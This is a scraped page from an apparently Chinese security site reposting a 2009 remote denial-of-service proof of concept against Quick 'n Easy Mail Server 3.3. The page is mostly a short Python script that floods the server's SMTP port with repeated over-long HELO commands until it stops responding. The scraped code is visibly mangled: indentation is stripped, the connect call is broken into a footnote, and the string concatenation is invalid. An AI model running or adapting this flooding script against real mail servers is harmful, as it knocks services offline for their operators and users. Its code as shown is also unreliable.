首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service PoC


(略)
# ---------------------------------------------------------------
# Quick 'n Easy Mail Server 3.3 (Demo) Remote Denial of Service
# http://www.pablosoftwaresolutions.com/

# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net/

# When you pass a long string to the server, it checks for bof
# type attacks and answers with a:
# "<SMTP> Buffer overflow: DOS attack?"
# after 25 requests (more or less), server is unable to handle
# errors.
# An attacker can exploit this issue to trigger dos conditions.
# In case of succesful exploitation of this vulnerability,
# the server will answer to requests as below:
# "<SMTP> 421 Service not available"
#---------------------------------------------------------------"

import socket

try:
for i in range(1,30):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn = s.connect[1]
s.send('HELO ' "AAA@AAAAAA.COM" * 4000 '\r\n')
d = s.recv(1024)
print d
s.close
raw_input("Done. If server is still available, try to increase the number of requests.\n\nPress enter to quit...")
except:
raw_input("Unable to connect!\n\nPress enter to quit...")

[2009-05-04]
附注
  1. "127.0.0.1",25
<< Bmxplay 0.4.4b (.BMX File) Local Buffer Overflow PoC
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号